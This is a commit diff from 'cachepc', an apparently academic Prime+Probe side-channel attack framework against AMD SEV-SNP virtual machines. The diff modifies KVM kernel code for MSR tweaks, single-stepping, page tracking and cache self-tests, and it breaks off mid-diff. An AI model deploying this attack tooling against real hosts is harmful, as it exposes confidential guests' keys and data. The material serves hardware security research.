cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit 3f43dd1778c7ac8c09c3dc5612ac902c3a7ad84d
parent f2ea010b8180b4160d85c92e312971d0cd8a34d4
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 19 Jan 2023 01:48:16 +0100

Many fixes, more precise single-stepping and more robust self-tests

Diffstat:
MMakefile | 1+
MREADME | 29++++++++++++++++++++++-------
Mcachepc/cachepc.c | 57+++++++++++++++++++++++++++++++++++++--------------------
Mcachepc/cachepc.h | 10+++++++---
Mcachepc/event.c | 2++
Mcachepc/kvm.c | 525+++++++++++++++++++++++++++++++------------------------------------------------
Mcachepc/uapi.h | 4++--
Mtest/kvm-step.c | 44+++++++++++++++++++++++++++++++++-----------
Mtest/kvm-step_guest.S | 18+++++++++++-------
9 files changed, 323 insertions(+), 367 deletions(-)

diff --git a/Makefile b/Makefile @@ -22,6 +22,7 @@ all: build $(BINS) clean: $(MAKE) -C $(LINUX) clean M=arch/x86/kvm $(MAKE) -C $(LINUX) clean M=crypto + rm -f cachepc/*.o rm -f $(BINS) $(LINUX)/arch/x86/kvm/cachepc: diff --git a/README b/README @@ -6,6 +6,10 @@ attack dubbed PRIME+COUNT that we demonstrate can be used to circumvent AMD's latest secure virtualization solution SEV-SNP to access sensitive guest information. + +tests +----- + Several test-cases were used to verify parts of the exploit chain separately: test/eviction: @@ -43,9 +47,14 @@ test/qemu-poc: Demonstrate that AES encryption keys can be leaked from an unmodified qemu-based linux guest. -Testing was done on a bare-metal AMD EPYC 72F3 (Family 0x19, Model 0x01) -cpu and Supermicro H12SSL-i V1.01 motherboard. The following BIOS settings -differ from the defaults: + +setup +----- + +Testing was done on a Supermicro H12SSL-i V1.01 motherboard and AMD EPYC 72F3 +(Family 0x19, Model 0x01) cpu. + +The following BIOS settings differ from the defaults: Advanced > CPU Configuration > Local APIC Mode = xAPIC Advanced > CPU Configuration > L1 Stream HW Prefetcher = Disabled @@ -57,11 +66,17 @@ Advanced > CPU Configuration > SEV ASID Space Limit = 110 Advanced > CPU Configuration > SNP Memory (RMP Table) Coverage = Enabled Advanced > North Bridge Configuration > SEV-SNP Support = Enabled Advanced > North Bridge Configuration > Memory Configuration > TSME = Disabled -Advanced > PCI Devices Common Settings > Memory Configuration > TSME = Disabled + +The following kernel parameters were used: + +kvm_amd.sev=1 kvm_amd.sev_es=1 nokaslr debug systemd.log_level=info + isolcpus=2,10,3,11 nohz_full=2,10,3,11 rcu_nocbs=2,10,3,11 nmi_watchdog=0 + transparent_hugepage=never apic lapic panic=-1 To successfully build and load the kvm.ko and kvm-amd.ko modules, ensure that a host kernel debian package was built using `make host`. -Note: because of bad decisions made in regards to version control, -the checked out commit of the modified kernel (previously the -kernel patch file) might be incorrect for older revisions. +Because of bad decisions made in regards to version control, the checked +out commit of the modified kernel (previously the kernel patch file) might +be incorrect for older revisions. + diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c @@ -1,6 +1,8 @@ #include "cachepc.h" #include "uapi.h" +#include "../../include/asm/processor.h" + #include <linux/kernel.h> #include <linux/types.h> #include <linux/slab.h> @@ -28,29 +30,28 @@ static bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len); bool cachepc_verify_topology(void) { + uint32_t assoc, linesize; + uint32_t size, sets; uint32_t val; - uint32_t assoc; - uint32_t linesize; - uint32_t size; - uint32_t sets; if (PAGE_SIZE != L1_SETS * L1_LINESIZE) CPC_ERR("System pagesize does not guarentee " "virtual memory access will hit corresponding " - "physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE\n"); + "physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE"); + /* REF: https://developer.amd.com/resources/developer-guides-manuals * (PPR 17H 31H, P.81) */ - asm volatile ("cpuid" : "=c"(val) : "a"(0x80000005)); + val = native_cpuid_ecx(0x80000005); size = ((val >> 24) & 0xFF) * 1024; assoc = (val >> 16) & 0xFF; linesize = val & 0xFF; sets = size / (linesize * assoc); if (size != L1_SIZE || assoc != L1_ASSOC || linesize != L1_LINESIZE || sets != L1_SETS) { - CPC_ERR("L1 topology is invalid!\n"); - CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n", + CPC_ERR("L1 topology is invalid!\n"); + CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n", L1_SIZE, size); CPC_ERR("L1_ASSOC (expected) %u vs. (real) %u\n", L1_ASSOC, assoc); @@ -61,7 +62,7 @@ cachepc_verify_topology(void) return true; } - asm volatile ("cpuid" : "=c"(val) : "a"(0x80000006)); + val = native_cpuid_ecx(0x80000006); size = ((val >> 16) & 0xFFFF) * 1024; assoc = (val >> 12) & 0xF; linesize = val & 0xFF; @@ -117,18 +118,31 @@ cachepc_verify_topology(void) } void +cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits) +{ + uint64_t val, newval; + uint32_t lo, hi; + + asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr)); + val = (uint64_t) lo | ((uint64_t) hi << 32); + val &= ~clear_bits; + val |= set_bits; + asm volatile ("wrmsr" : : "c"(addr), "a"(val), "d"(0x00)); + + asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr)); + newval = (uint64_t) lo | ((uint64_t) hi << 32); + if (val != newval) + CPC_ERR("Write MSR failed at addr %08llX\n", addr); +} + +void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, uint8_t host_guest, uint8_t kernel_user) { - uint64_t event; uint64_t reg_addr; + uint64_t event; - /* REF: https://developer.amd.com/resources/developer-guides-manuals - * (PPR 19H 01H, P.166) - * - * performance event selection via 0xC001_020X with X = (0..A)[::2] - * performance event reading viea 0XC001_020X with X = (1..B)[::2] - */ + /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.166 */ WARN_ON(index >= 6); if (index >= 6) return; @@ -138,7 +152,8 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, event |= (1ULL << 22); /* enable performance counter */ event |= ((kernel_user & 0b11) * 1ULL) << 16; event |= ((host_guest & 0b11) * 1ULL) << 40; - printk(KERN_WARNING "CachePC: Initialized %i. PMC %02X:%02X (%016llx)\n", + + printk(KERN_WARNING "CachePC: Initializing %i. PMC %02X:%02X (%016llx)\n", index, event_no, event_mask, event); asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00)); } @@ -154,7 +169,8 @@ cachepc_reset_pmc(uint8_t index) reg_addr = 0xc0010201 + index * 2; value = 0; - asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value)); + + asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value), "d"(0x00)); } cache_ctx * @@ -247,6 +263,7 @@ cachepc_save_msrmts(cacheline *head) cachepc_msrmts[curr_cl->cache_set] = curr_cl->count; } + curr_cl->count = 0; curr_cl = curr_cl->prev; } while (curr_cl != head); @@ -289,8 +306,8 @@ cachepc_update_baseline(void) void __attribute__((optimize(1))) // prevent instruction reordering cachepc_prime_vcall(uintptr_t ret, cacheline *cl) { - if (cachepc_single_step) - cachepc_apic_oneshot(cachepc_apic_timer); + if (cachepc_singlestep) + cachepc_apic_oneshot(cachepc_apic_timer / CPC_APIC_TIMER_SOFTDIV); cachepc_prime(cl); asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax"); } diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h @@ -42,6 +42,8 @@ #define CPC_WARN(...) do { pr_warn("CachePC: " __VA_ARGS__); } while (0) #define CPC_ERR(...) do { pr_err("CachePC: " __VA_ARGS__); } while (0) +#define CPC_APIC_TIMER_SOFTDIV 3 + typedef struct cacheline cacheline; typedef struct cache_ctx cache_ctx; @@ -83,6 +85,7 @@ static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8); bool cachepc_verify_topology(void); +void cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits); void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask, uint8_t host_guest, uint8_t kernel_user); void cachepc_reset_pmc(uint8_t index); @@ -129,10 +132,11 @@ extern bool cachepc_baseline_active; extern bool cachepc_pause_vm; -extern bool cachepc_single_step; -extern uint32_t cachepc_track_mode; +extern bool cachepc_singlestep; +extern bool cachepc_singlestep_reset; extern uint32_t cachepc_apic_timer; +extern uint32_t cachepc_track_mode; extern uint64_t cachepc_track_start_gfn; extern uint64_t cachepc_track_end_gfn; @@ -166,7 +170,7 @@ cachepc_prime(cacheline *head) cachepc_mfence(); cachepc_cpuid(); - + curr_cl = head; do { prev_cl = curr_cl; diff --git a/cachepc/event.c b/cachepc/event.c @@ -181,6 +181,8 @@ cachepc_handle_ack_event_ioctl(uint64_t eventid) write_lock(&cachepc_event_lock); if (!eventid || eventid == cachepc_last_event_sent) { + if (cachepc_event.type == CPC_EVENT_PAUSE) + cachepc_pause_vm = false; err = 0; cachepc_last_event_acked = cachepc_last_event_sent; } else { diff --git a/cachepc/kvm.c b/cachepc/kvm.c @@ -16,6 +16,8 @@ #include <linux/types.h> #include <asm/uaccess.h> +#define TEST_REPEAT_MAX 200 + bool cachepc_debug = false; EXPORT_SYMBOL(cachepc_debug); @@ -44,15 +46,17 @@ EXPORT_SYMBOL(cachepc_rip); EXPORT_SYMBOL(cachepc_rip_prev); EXPORT_SYMBOL(cachepc_rip_prev_set); -bool cachepc_single_step = false; -uint32_t cachepc_track_mode = false; +bool cachepc_singlestep = false; +bool cachepc_singlestep_reset = false; uint32_t cachepc_apic_timer = 0; -EXPORT_SYMBOL(cachepc_single_step); -EXPORT_SYMBOL(cachepc_track_mode); +EXPORT_SYMBOL(cachepc_singlestep); +EXPORT_SYMBOL(cachepc_singlestep_reset); EXPORT_SYMBOL(cachepc_apic_timer); +uint32_t cachepc_track_mode = false; uint64_t cachepc_track_start_gfn = 0; uint64_t cachepc_track_end_gfn = 0; +EXPORT_SYMBOL(cachepc_track_mode); EXPORT_SYMBOL(cachepc_track_start_gfn); EXPORT_SYMBOL(cachepc_track_end_gfn); @@ -91,9 +95,9 @@ EXPORT_SYMBOL(cachepc_event_avail); bool cachepc_events_init; EXPORT_SYMBOL(cachepc_events_init); -static void cachepc_kvm_prime_probe_test(void *p); -static void cachepc_kvm_stream_hwpf_test(void *p); -static void cachepc_kvm_single_eviction_test(void *p); +static noinline void cachepc_kvm_prime_probe_test(void); +static noinline void cachepc_kvm_stream_hwpf_test(void); +static noinline void cachepc_kvm_single_eviction_test(void *p); static void cachepc_kvm_system_setup(void); @@ -109,104 +113,96 @@ static int cachepc_kvm_calc_baseline_ioctl(void __user *arg_user); static int cachepc_kvm_read_baseline_ioctl(void __user *arg_user); static int cachepc_kvm_apply_baseline_ioctl(void __user *arg_user); -//static int cachepc_kvm_single_step_ioctl(void __user *arg_user); - static int cachepc_kvm_vmsa_read_ioctl(void __user *arg_user); static int cachepc_kvm_svme_read_ioctl(void __user *arg_user); +static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user); static int cachepc_kvm_track_mode_ioctl(void __user *arg_user); // static int cachepc_kvm_track_page_ioctl(void __user *arg_user); -// static int cachepc_kvm_track_all_ioctl(void __user *arg_user); -// static int cachepc_kvm_untrack_all_ioctl(void __user *arg_user); -static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user); // static int cachepc_kvm_track_range_start_ioctl(void __user *arg_user); // static int cachepc_kvm_track_range_end_ioctl(void __user *arg_user); // static int cachepc_kvm_track_exec_cur_ioctl(void __user *arg_user); -static int cachepc_kvm_vm_pause_ioctl(void __user *arg_user); -static int cachepc_kvm_vm_resume_ioctl(void __user *arg_user); - static int cachepc_kvm_poll_event_ioctl(void __user *arg_user); static int cachepc_kvm_ack_event_ioctl(void __user *arg_user); +static int cachepc_kvm_req_pause_ioctl(void __user *arg_user); + void -cachepc_kvm_prime_probe_test(void *p) +cachepc_kvm_prime_probe_test(void) { cacheline *lines; cacheline *cl, *head; uint32_t count; - uint32_t *arg; - int i, max; - - arg = p; + int n; /* l2 data cache hit & miss */ cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL); lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size); - max = cachepc_ctx->nr_of_cachelines; - - cachepc_cpuid(); - cachepc_mfence(); + // wbinvd(); - for (i = 0; i < max; i++) - asm volatile ("mov (%0), %%rbx" : : "r"(lines + i) : "rbx"); + for (n = 0; n < TEST_REPEAT_MAX; n++) { + head = cachepc_prime(cachepc_ds); + cachepc_probe(head); - head = cachepc_prime(cachepc_ds); - cachepc_probe(head); + count = 0; + cl = head = cachepc_ds; + do { + if (CL_IS_FIRST(cl->flags)) + count += cl->count; + cl = cl->next; + } while (cl != head); - count = 0; - cl = head = cachepc_ds; - do { - count += cl->count; - cl = cl->next; - } while (cl != head); - - CPC_WARN("Prime-probe test done (%u vs. %u => %s)\n", - count, 0, (count == 0) ? "passed" : "failed"); + if (count != 0) { + CPC_ERR("Prime-probe %i. test failed (%u vs. %u)\n", + n, count, 0); + break; + } + } - if (arg) *arg = (count == 0); + if (n == TEST_REPEAT_MAX) + CPC_WARN("Prime-probe test ok (%u vs. %u)\n", count, 0); kfree(lines); } void -cachepc_kvm_stream_hwpf_test(void *p) +cachepc_kvm_stream_hwpf_test(void) { cacheline *lines; + const uint32_t max = 4; uint32_t count; - uint32_t *arg; - uint32_t max; - - arg = p; + int n; /* l2 data cache hit & miss */ cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL); lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size); - max = 10; + // wbinvd(); + count = 0; - cachepc_prime(cachepc_ds); - - count -= cachepc_read_pmc(CPC_L1MISS_PMC); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 4) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 5) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 6) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 7) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 8) : "rbx"); - asm volatile ("mov (%0), %%rbx" : : "r"(lines + 9) : "rbx"); - count += cachepc_read_pmc(CPC_L1MISS_PMC); - - CPC_WARN("HWPF test done (%u vs. %u => %s)\n", - count, max, count == max ? "passed" : "failed"); - - if (arg) *arg = (count == max); + for (n = 0; n < TEST_REPEAT_MAX; n++) { + cachepc_prime(cachepc_ds); + + count -= cachepc_read_pmc(CPC_L1MISS_PMC); + asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx"); + asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx"); + asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx"); + asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx"); + count += cachepc_read_pmc(CPC_L1MISS_PMC); + + if (count != max) { + CPC_ERR("HWPF %i. test failed (%u vs. %u)\n", + n, count, max); + break; + } + } + + if (n == TEST_REPEAT_MAX) + CPC_INFO("HWPF test ok (%u vs. %u)\n", count, max); kfree(lines); } @@ -218,7 +214,7 @@ cachepc_kvm_single_eviction_test(void *p) cacheline *ptr; uint32_t target; uint32_t *arg; - int count; + int n, count; arg = p; @@ -231,27 +227,38 @@ cachepc_kvm_single_eviction_test(void *p) ptr = cachepc_prepare_victim(cachepc_ctx, target); - head = cachepc_prime(cachepc_ds); - cachepc_victim(ptr); - cachepc_probe(head); - - count = 0; - evicted = NULL; - cl = head = cachepc_ds; - do { - if (CL_IS_FIRST(cl->flags) && cl->count > 0) { - evicted = cl; - count += cl->count; + // wbinvd(); + + for (n = 0; n < TEST_REPEAT_MAX; n++) { + head = cachepc_prime(cachepc_ds); + cachepc_victim(ptr); + cachepc_probe(head); + + count = 0; + evicted = NULL; + cl = head = cachepc_ds; + do { + if (CL_IS_FIRST(cl->flags) && cl->count > 0) { + evicted = cl; + count += cl->count; + } + cl = cl->next; + } while (cl != head); + + if (count != 1 || evicted->cache_set != target) { + CPC_ERR("Single eviction %i. test failed (%u vs %u)\n", + n, count, 1); + if (arg) *arg = count; + break; } - cl = cl->next; - } while (cl != head); - CPC_WARN("Single eviction test done (%u vs %u => %s)\n", - count, 1, (count == 1 && evicted->cache_set == target) - ? "passed" : "failed"); - cachepc_save_msrmts(head); + cachepc_save_msrmts(head); + } - if (arg) *arg = count; + if (n == TEST_REPEAT_MAX) { + CPC_INFO("Single eviction test ok (%u vs %u)\n", count, 1); + if (arg) *arg = count; + } cachepc_release_victim(cachepc_ctx, ptr); } @@ -259,69 +266,41 @@ cachepc_kvm_single_eviction_test(void *p) void cachepc_kvm_system_setup(void) { - uint64_t reg_addr, val; - uint32_t lo, hi; - /* NOTE: since most of these MSRs are poorly documented and some * guessing work was involved, it is likely that one or more of * these operations are not needed */ - /* disable streaming store */ - reg_addr = 0xc0011020; - asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr)); - val = (uint64_t) lo | ((uint64_t) hi << 32); - val |= 1 << 13; - CPC_WARN("Disabling streaming store (MSR %08llX: %016llX)\n", - reg_addr, val); - asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00)); - - /* disable speculative data cache tlb reloads */ - reg_addr = 0xc0011022; - asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr)); - val = (uint64_t) lo | ((uint64_t) hi << 32); - val |= 1 << 4; - CPC_WARN("Disabling speculative reloads (MSR %08llX: %016llX)\n", - reg_addr, val); - asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00)); - - /* disable data cache hw prefetchers */ - reg_addr = 0xc0011022; - asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr)); - val = (uint64_t) lo | ((uint64_t) hi << 32); - val |= 1 << 13; - CPC_WARN("Disabling DATA HWPF (MSR %08llX: %016llX)\n", - reg_addr, val); - asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00)); + // /* disable streaming store */ + // cachepc_write_msr(0xc0011020, 0, 1ULL << 13); + + // /* disable speculative data cache tlb reloads */ + // cachepc_write_msr(0xc0011022, 0, 1ULL << 4); + + // /* disable data cache hw prefetchers */ + // cachepc_write_msr(0xc0011022, 0, 1ULL << 13); /* disable inst cache hw prefetchers */ - reg_addr = 0xc0011021; - asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr)); - val = (uint64_t) lo | ((uint64_t) hi << 32); - val |= 1 << 13; - CPC_WARN("Disabling INST HWPF (MSR %08llX: %016llX)\n", - reg_addr, val); - asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00)); - - /* REF: https://arxiv.org/pdf/2204.03290.pdf - * Paper "Memory Performance of AMD EPYC Rome and Intel Cascade - * Lake SP Server Processors" - * disable L1 & L2 prefetchers */ - - reg_addr = 0xc0011022; - asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr)); - val = (uint64_t) lo | ((uint64_t) hi << 32); - val |= 1 << 16; - printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n", - reg_addr, val); - asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00)); - - reg_addr = 0xc001102b; - asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr)); - val = (uint64_t) lo | ((uint64_t) hi << 32); - val &= ~1ULL; - printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n", - reg_addr, val); - asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00)); + cachepc_write_msr(0xc0011021, 0, 1ULL << 13); + + /* REF: https://arxiv.org/pdf/2204.03290.pdf */ + /* l1 and l2 prefetchers */ + cachepc_write_msr(0xc0011022, 0, 1ULL << 16); + cachepc_write_msr(0xc001102b, 1ULL << 0, 0); + + /* REF: https://community.amd.com/t5/archives-discussions/modifying-msr-to-disable-the-prefetcher/td-p/143443 */ + cachepc_write_msr(0xc001102b, 0, 1ULL << 18); + + /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168 + * disable L1 and L2 prefetcher */ + cachepc_write_msr(0xC0000108, 0, 0b00101111); + + /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111 + * disable speculation */ + cachepc_write_msr(0x00000048, 0, 0b10000111); + + /* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.175 + * disable core performance boost */ + cachepc_write_msr(0xC0010015, 0, 1ULL << 25); } int @@ -351,6 +330,11 @@ cachepc_kvm_reset_ioctl(void __user *arg_user) cachepc_kvm_reset_tracking_ioctl(NULL); cachepc_kvm_reset_baseline_ioctl(NULL); + cachepc_singlestep = false; + cachepc_singlestep_reset = false; + cachepc_apic_timer = 0; + cachepc_rip_prev_set = false; + return 0; } @@ -455,74 +439,6 @@ cachepc_kvm_apply_baseline_ioctl(void __user *arg_user) } int -cachepc_kvm_single_step_ioctl(void __user *arg_user) -{ - cachepc_single_step = true; - - return 0; -} - -int -cachepc_kvm_track_mode_ioctl(void __user *arg_user) -{ - struct kvm_vcpu *vcpu; - uint32_t mode; - - if (!arg_user) return -EINVAL; - - if (copy_from_user(&mode, arg_user, sizeof(mode))) - return -EFAULT; - - cachepc_single_step = false; - cachepc_track_mode = mode; - - BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array)); - vcpu = xa_load(&main_vm->vcpu_array, 0); - - cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC); - cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS); - cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE); - - switch (mode) { - case CPC_TRACK_FULL: - cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS); - mode = CPC_TRACK_FULL; - break; - case CPC_TRACK_EXEC: - cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC); - mode = CPC_TRACK_EXEC; - break; - default: - mode = CPC_TRACK_NONE; - break; - } - - return 0; -} - -int -cachepc_kvm_track_page_ioctl(void __user *arg_user) -{ - struct cpc_track_config cfg; - struct kvm_vcpu *vcpu; - - if (!main_vm || !arg_user) return -EINVAL; - - if (copy_from_user(&cfg, arg_user, sizeof(cfg))) - return -EFAULT; - - if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX) - return -EINVAL; - - BUG_ON(xa_empty(&main_vm->vcpu_array)); - vcpu = xa_load(&main_vm->vcpu_array, 0); - if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode)) - return -EFAULT; - - return 0; -} - -int cachepc_kvm_vmsa_read_ioctl(void __user *arg_user) { struct kvm_vcpu *vcpu; @@ -563,50 +479,6 @@ cachepc_kvm_svme_read_ioctl(void __user *arg_user) return 0; } -// int -// cachepc_kvm_track_all_ioctl(void __user *arg_user) -// { -// struct kvm_vcpu *vcpu; -// uint32_t mode; -// -// if (!main_vm || !arg_user) return -EINVAL; -// -// if (copy_from_user(&mode, arg_user, sizeof(mode))) -// return -EFAULT; -// -// if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX) -// return -EINVAL; -// -// BUG_ON(xa_empty(&main_vm->vcpu_array)); -// vcpu = xa_load(&main_vm->vcpu_array, 0); -// if (!cachepc_track_all(vcpu, mode)) -// return -EFAULT; -// -// return 0; -// } -// -// int -// cachepc_kvm_untrack_all_ioctl(void __user *arg_user) -// { -// struct kvm_vcpu *vcpu; -// uint32_t mode; -// -// if (!main_vm || !arg_user) return -EINVAL; -// -// if (copy_from_user(&mode, arg_user, sizeof(mode))) -// return -EFAULT; -// -// if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX) -// return -EINVAL; -// -// BUG_ON(xa_empty(&main_vm->vcpu_array)); -// vcpu = xa_load(&main_vm->vcpu_array, 0); -// if (!cachepc_untrack_all(vcpu, mode)) -// return -EFAULT; -// -// return 0; -// } - int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user) { @@ -619,15 +491,16 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user) cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS); cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE); - cachepc_track_mode = CPC_TRACK_NONE; - cachepc_inst_fault_gfn = 0; cachepc_inst_fault_err = 0; cachepc_track_start_gfn = 0; cachepc_track_end_gfn = 0; - cachepc_single_step = false; + cachepc_singlestep = false; + cachepc_singlestep_reset = false; + + cachepc_track_mode = CPC_TRACK_NONE; list_for_each_entry_safe(fault, next, &cachepc_faults, list) { list_del(&fault->list); @@ -638,31 +511,73 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user) } int -cachepc_kvm_poll_event_ioctl(void __user *arg_user) +cachepc_kvm_track_mode_ioctl(void __user *arg_user) { - if (!cachepc_events_init) - return -EINVAL; + struct kvm_vcpu *vcpu; + uint32_t mode; - return cachepc_handle_poll_event_ioctl(arg_user); -} + if (!arg_user) return -EINVAL; -int -cachepc_kvm_ack_event_ioctl(void __user *arg_user) -{ - uint64_t eventid; + if (copy_from_user(&mode, arg_user, sizeof(mode))) + return -EFAULT; - if (!arg_user) return -EINVAL; + BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array)); + vcpu = xa_load(&main_vm->vcpu_array, 0); - if (!cachepc_events_init) - return -EINVAL; + cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC); + cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS); + cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE); - if (copy_from_user(&eventid, arg_user, sizeof(eventid))) - return -EFAULT; + cachepc_apic_timer = 0; + cachepc_singlestep = false; + cachepc_singlestep_reset = false; - return cachepc_handle_ack_event_ioctl(eventid); + switch (mode) { + case CPC_TRACK_FULL: + cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS); + cachepc_singlestep_reset = true; + cachepc_track_mode = CPC_TRACK_FULL; + break; + case CPC_TRACK_EXEC: + cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC); + cachepc_singlestep_reset = true; + cachepc_track_mode = CPC_TRACK_EXEC; + break; + case CPC_TRACK_FAULT_NO_RUN: + cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS); + cachepc_track_mode = CPC_TRACK_FAULT_NO_RUN; + break; + default: + cachepc_track_mode = CPC_TRACK_NONE; + break; + } + + return 0; } // int +// cachepc_kvm_track_page_ioctl(void __user *arg_user) +// { +// struct cpc_track_config cfg; +// struct kvm_vcpu *vcpu; +// +// if (!main_vm || !arg_user) return -EINVAL; +// +// if (copy_from_user(&cfg, arg_user, sizeof(cfg))) +// return -EFAULT; +// +// if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX) +// return -EINVAL; +// +// BUG_ON(xa_empty(&main_vm->vcpu_array)); +// vcpu = xa_load(&main_vm->vcpu_array, 0); +// if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode)) +// return -EFAULT; +// +// return 0; +// } +// +// int // cachepc_kvm_track_range_start_ioctl(void __user *arg_user) // { // if (!arg_user) return -EINVAL; @@ -701,41 +616,16 @@ cachepc_kvm_ack_event_ioctl(void __user *arg_user) // } int -cachepc_kvm_vm_pause_ioctl(void __user *arg_user) +cachepc_kvm_poll_event_ioctl(void __user *arg_user) { - uint64_t deadline; - int err; - - if (!arg_user) return -EINVAL; - if (!cachepc_events_init) return -EINVAL; - cachepc_pause_vm = true; - - deadline = ktime_get_ns() + 20000000000ULL; /* 20s in ns */ - while (true) { - write_lock(&cachepc_event_lock); - if (cachepc_event_avail) { - err = copy_to_user(arg_user, &cachepc_event, - sizeof(struct cpc_event)); - cachepc_event_avail = false; - write_unlock(&cachepc_event_lock); - return 0; - } - write_unlock(&cachepc_event_lock); - if (ktime_get_ns() > deadline) { - CPC_WARN("Timeout waiting for pause event\n"); - cachepc_pause_vm = false; - return -EFAULT; - } - } - - return err; + return cachepc_handle_poll_event_ioctl(arg_user); } int -cachepc_kvm_vm_resume_ioctl(void __user *arg_user) +cachepc_kvm_ack_event_ioctl(void __user *arg_user) { uint64_t eventid; @@ -747,11 +637,19 @@ cachepc_kvm_vm_resume_ioctl(void __user *arg_user) if (copy_from_user(&eventid, arg_user, sizeof(eventid))) return -EFAULT; - cachepc_pause_vm = false; - return cachepc_handle_ack_event_ioctl(eventid); } +int +cachepc_kvm_req_pause_ioctl(void __user *arg_user) +{ + if (arg_user) return -EINVAL; + + cachepc_pause_vm = true; + + return 0; +} + long cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg) { @@ -775,36 +673,28 @@ cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg) return cachepc_kvm_calc_baseline_ioctl(arg_user); case KVM_CPC_APPLY_BASELINE: return cachepc_kvm_apply_baseline_ioctl(arg_user); - // case KVM_CPC_SINGLE_STEP: - // return cachepc_kvm_single_step_ioctl(arg_user); case KVM_CPC_VMSA_READ: return cachepc_kvm_vmsa_read_ioctl(arg_user); case KVM_CPC_SVME_READ: return cachepc_kvm_svme_read_ioctl(arg_user); - case 